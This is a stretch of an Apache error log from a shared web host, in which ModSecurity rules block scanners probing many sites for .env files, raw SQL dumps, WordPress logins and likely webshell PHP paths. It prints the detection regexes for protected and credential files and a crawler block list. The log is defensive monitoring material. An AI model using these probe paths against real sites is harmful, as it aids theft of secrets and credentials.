[Tue May 26 13:17:34.527524 2026] [security2:error] [pid 501489:tid 501672] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/user/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTMwAAALk"]
[Tue May 26 13:17:34.543045 2026] [security2:error] [pid 501489:tid 501682] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/v1/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTNQAAAMM"]
[Tue May 26 13:17:34.568309 2026] [security2:error] [pid 501489:tid 501692] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/v2/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTOAAAAM0"]
[Tue May 26 13:17:34.570309 2026] [security2:error] [pid 501489:tid 501729] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/v3/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTOQAAAPA"]
[Tue May 26 13:17:34.765880 2026] [security2:error] [pid 501489:tid 501744] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/var/www/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTSQAAAP0"]
[Tue May 26 13:17:34.779535 2026] [security2:error] [pid 501489:tid 501713] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/var/www/html/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTSwAAAOI"]
[Tue May 26 13:17:34.835908 2026] [security2:error] [pid 501489:tid 501719] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/web/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTVgAAAOg"]
[Tue May 26 13:17:34.988507 2026] [security2:error] [pid 501489:tid 501675] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/website/.env"] [unique_id "ahVQFmkFNZ9cRlz80IjTaAAAALw"]
[Tue May 26 13:17:35.198673 2026] [security2:error] [pid 501489:tid 501619] [client 195.178.110.199:0] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "webdisk.ndequipments.com"] [uri "/___proxy_subdomain_webdisk/wp-content/mysql.sql"] [unique_id "ahVQF2kFNZ9cRlz80IjTdwAAAIU"]
[Tue May 26 13:17:35.410456 2026] [core:error] [pid 501489:tid 501630] [client 120.76.231.11:53946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:17:35.410475 2026] [core:error] [pid 501489:tid 501630] [client 120.76.231.11:53946] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:17:35.857937 2026] [security2:error] [pid 501489:tid 501718] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQF2kFNZ9cRlz80IjThgAAAOc"]
[Tue May 26 13:17:37.608772 2026] [security2:error] [pid 501489:tid 501671] [client 176.65.139.234:42436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "amslca.com.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGWkFNZ9cRlz80IjTtQAAALg"]
[Tue May 26 13:17:37.610238 2026] [security2:error] [pid 501489:tid 501668] [client 176.65.139.235:33524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dhmwayanad.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGWkFNZ9cRlz80IjTtgAAALU"]
[Tue May 26 13:17:37.717557 2026] [security2:error] [pid 501489:tid 501631] [client 176.65.139.231:27994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.mrgtp.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGWkFNZ9cRlz80IjTtwAAAJE"]
[Tue May 26 13:17:37.730474 2026] [security2:error] [pid 501489:tid 501700] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQGWkFNZ9cRlz80IjTrgAAANU"]
[Tue May 26 13:17:37.759100 2026] [security2:error] [pid 501489:tid 501734] [client 176.65.139.235:33534] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.futurance.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGWkFNZ9cRlz80IjTuAAAAPQ"]
[Tue May 26 13:17:38.159598 2026] [security2:error] [pid 501489:tid 501657] [client 176.65.139.235:33546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dglmmm.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGmkFNZ9cRlz80IjTxAAAAKo"]
[Tue May 26 13:17:38.931360 2026] [security2:error] [pid 501489:tid 501630] [client 176.65.139.237:47860] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.shirdisaibabatemple.org.svijaykumar.in"] [uri "/.env"] [unique_id "ahVQGmkFNZ9cRlz80IjT3wAAAJA"]
[Tue May 26 13:17:39.093302 2026] [security2:error] [pid 501489:tid 501662] [client 4.201.75.230:34701] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/bless.php"] [unique_id "ahVQG2kFNZ9cRlz80IjT4gAAAK8"]
[Tue May 26 13:17:40.109190 2026] [security2:error] [pid 501489:tid 501720] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQG2kFNZ9cRlz80IjT9AAAAOk"]
[Tue May 26 13:17:40.730772 2026] [proxy:error] [pid 501489:tid 501516] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:17:40.730813 2026] [proxy_http:error] [pid 501489:tid 501516] [remote 147.185.132.126:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:17:40.731372 2026] [proxy:error] [pid 501489:tid 501516] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:17:40.731402 2026] [proxy_http:error] [pid 501489:tid 501516] [remote 147.185.132.126:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:17:40.833179 2026] [security2:error] [pid 501489:tid 501689] [client 176.65.139.233:34342] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mrgtp.in"] [uri "/.env"] [unique_id "ahVQHGkFNZ9cRlz80IjUFQAAAMo"]
[Tue May 26 13:17:41.434242 2026] [security2:error] [pid 501489:tid 501667] [client 176.65.139.237:47876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "amslca.com"] [uri "/.env"] [unique_id "ahVQHWkFNZ9cRlz80IjUKgAAALQ"]
[Tue May 26 13:17:41.489948 2026] [security2:error] [pid 501489:tid 501576] [remote 141.95.202.18:43204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/wp-login.php"] [unique_id "ahVQHWkFNZ9cRlz80IjUJgAAsFY"]
[Tue May 26 13:17:41.500418 2026] [security2:error] [pid 501489:tid 501668] [client 176.65.139.234:42502] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shirdisaibabatemple.org"] [uri "/.env"] [unique_id "ahVQHWkFNZ9cRlz80IjUKwAAALU"]
[Tue May 26 13:17:41.976742 2026] [security2:error] [pid 501489:tid 501642] [client 4.201.75.230:26400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahVQHWkFNZ9cRlz80IjUOQAAAJw"]
[Tue May 26 13:17:42.317547 2026] [security2:error] [pid 501489:tid 501628] [client 176.65.139.233:34356] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dglmmm.org.in"] [uri "/.env"] [unique_id "ahVQHmkFNZ9cRlz80IjUQAAAAI4"]
[Tue May 26 13:17:42.990075 2026] [security2:error] [pid 501489:tid 501705] [client 114.119.130.177:52635] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.toronto121mortgage.com"] [uri "/apply-now.html"] [unique_id "ahVQHmkFNZ9cRlz80IjUWQAAANo"], referer: http://www.video-bookmark.com/user/toronto121mortgage/1
[Tue May 26 13:17:43.152021 2026] [security2:error] [pid 501489:tid 501710] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQHmkFNZ9cRlz80IjUUQAAAN8"]
[Tue May 26 13:17:44.626217 2026] [security2:error] [pid 501489:tid 501672] [client 4.201.75.230:33874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/xmrlpc.php"] [unique_id "ahVQIGkFNZ9cRlz80IjUnwAAALk"]
[Tue May 26 13:17:44.866990 2026] [security2:error] [pid 501489:tid 501697] [client 142.248.80.176:19786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahVQIGkFNZ9cRlz80IjUpAAAANI"]
[Tue May 26 13:17:44.964125 2026] [security2:error] [pid 501489:tid 501731] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQIGkFNZ9cRlz80IjUnAAAAPE"]
[Tue May 26 13:17:45.380393 2026] [security2:error] [pid 501489:tid 501694] [client 142.248.80.176:19836] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahVQIWkFNZ9cRlz80IjUwgAAAM8"]
[Tue May 26 13:17:45.382738 2026] [security2:error] [pid 501489:tid 501734] [client 142.248.80.176:19822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVQIWkFNZ9cRlz80IjUxQAAAPQ"]
[Tue May 26 13:17:45.383587 2026] [security2:error] [pid 501489:tid 501723] [client 142.248.80.176:19806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.operatives.org.in"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahVQIWkFNZ9cRlz80IjUvgAAAOs"]
[Tue May 26 13:17:45.532659 2026] [security2:error] [pid 501489:tid 501624] [client 146.174.160.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQIWkFNZ9cRlz80IjUsQAAAIo"]
[Tue May 26 13:17:46.118612 2026] [security2:error] [pid 501489:tid 501727] [client 4.201.75.230:33862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/class.php"] [unique_id "ahVQImkFNZ9cRlz80IjU4QAAAO4"]
[Tue May 26 13:17:46.828437 2026] [security2:error] [pid 501489:tid 501570] [remote 172.232.108.36:6024] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "207.174.214.47"] [uri "/"] [unique_id "ahVQImkFNZ9cRlz80IjU9gAAzlA"]
[Tue May 26 13:17:46.879890 2026] [security2:error] [pid 501489:tid 501695] [client 4.201.75.230:33896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/aw.php"] [unique_id "ahVQImkFNZ9cRlz80IjU9wAAANA"]
[Tue May 26 13:17:46.986076 2026] [security2:error] [pid 501489:tid 501649] [client 45.148.10.204:45638] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQImkFNZ9cRlz80IjVAAAAAKI"]
[Tue May 26 13:17:46.995251 2026] [security2:error] [pid 501489:tid 501728] [client 45.148.10.204:45640] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQImkFNZ9cRlz80IjVAgAAAO8"]
[Tue May 26 13:17:47.022029 2026] [security2:error] [pid 501489:tid 501626] [client 45.148.10.204:45656] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVBAAAAIw"]
[Tue May 26 13:17:47.026440 2026] [security2:error] [pid 501489:tid 501690] [client 45.148.10.204:45660] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVBQAAAMs"]
[Tue May 26 13:17:47.132484 2026] [security2:error] [pid 501489:tid 501625] [client 45.148.10.204:45684] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVBgAAAIs"]
[Tue May 26 13:17:47.143983 2026] [security2:error] [pid 501489:tid 501633] [client 45.148.10.204:45674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVBwAAAJM"]
[Tue May 26 13:17:47.154187 2026] [security2:error] [pid 501489:tid 501708] [client 45.148.10.204:45680] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVCAAAAN0"]
[Tue May 26 13:17:47.160936 2026] [security2:error] [pid 501489:tid 501621] [client 45.148.10.204:45716] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.soft.ucdc.co.in"] [uri "/index.php"] [unique_id "ahVQI2kFNZ9cRlz80IjVCQAAAIc"]
